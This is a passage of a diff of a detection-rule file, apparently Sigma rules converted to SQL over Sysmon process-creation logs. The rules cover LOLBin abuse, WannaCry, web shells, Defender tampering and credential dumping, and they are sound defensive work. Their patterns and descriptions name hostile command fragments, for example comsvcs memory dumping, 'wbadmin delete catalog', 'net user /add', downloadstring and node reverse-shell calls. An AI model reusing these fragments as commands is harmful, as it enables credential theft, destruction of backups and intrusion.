'%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_remote.yml" + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" }, { - "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", - "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "title": "CL_LoadAssembly.ps1 Proxy Execution", + "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", "status": "experimental", - "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. 
This is often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_hotfix.yml" + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" }, { - "title": "Using AppVLP To Circumvent ASR File Path Rule", - "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "title": "DumpMinitool Execution", + "id": "dee0a7a3-f200-4112-a99b-952196d81e42", "status": "experimental", - "description": "Application Virtualization Utility is included with Microsoft Office. 
We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", - "author": "Sreeman", + "description": "Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.t1218", "attack.defense_evasion", - "attack.execution" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND (CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_appvlp.yml" + "filename": "proc_creation_win_dumpminitool_execution.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Command Line Execution with Suspicious URL and AppData Strings", + "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "status": "test", + 
"description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.command_and_control", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1105" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "High" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_cmd_http_appdata.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", - "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" ], "falsepositives": [ - "Unlikely" + "Software that uses the caret encased keywords PASS and USER in its command line" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_node_abuse.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "Malicious Windows Script Components File Execution by TAEF Detection", - "id": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "title": "Taskmgr as Parent", + "id": "3d7679bd-0c00-440c-97b0-3f204273e6c7", "status": "test", - "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running 
te.exe\n", - "author": "Agro (@agro_sev) oscd.community", + "description": "Detects the creation of a process from Windows task manager", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1218" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "It's not an uncommon to use te.exe directly to execute legal TAEF tests" + "Administrative activity" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\te.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\te.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\te.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\taskmgr.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\resmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_use_of_te_bin.yml" + "filename": "proc_creation_win_taskmgr_susp_child_process.yml" }, { - "title": "Tap Installer Execution", - "id": "99793437-3e16-439b-be0f-078782cf953d", - "status": "test", - "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunneling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "status": "experimental", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine 
LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tapinstall_execution.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Psr.exe Capture Screenshots", - "id": "2158f96f-43c2-43cb-952a-ab4580f32382", + "title": "New Service Creation Using Sc.EXE", + "id": "85ff530b-261d-48c6-a441-facaa2e81e48", "status": "test", - "description": "The psr.exe captures desktop screenshots and saves them on the local machine", - "author": "Beyu Denis, oscd.community", + "description": "Detects the creation of a new service using the \"sc.exe\" utility.", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.collection", - "attack.t1113" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or user creates a service for legitimate reasons.", + "Software installation" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\')" ], - "filename": "proc_creation_win_psr_capture_screenshots.yml" + "filename": 
"proc_creation_win_sc_create_service.yml" }, { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Invoke-WebRequest Execution With DirectIP", + "id": "1edff897-9146-48d2-9066-52e8d8f80a2f", + "status": "experimental", + "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", "attack.t1105" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' 
ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_direct_ip.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" ], "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE 
'\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' 
ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "Changing Existing Service ImagePath Value Via Reg.EXE", - "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", - "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "author": "frack113", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. 
This is often used after a privilege escalation attempt.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_service_imagepath_change.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Download Arbitrary Files Via PresentationHost.exe", + "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "status": "experimental", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM 
logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_lolbin_presentationhost_download.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", - "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "author": "Florian Roth (Nextron Systems)", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "status": "test", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.t1190" ], "falsepositives": [ - "Unlikely" + "Particular web applications may spawn a shell process legitimately" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE 
'%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR 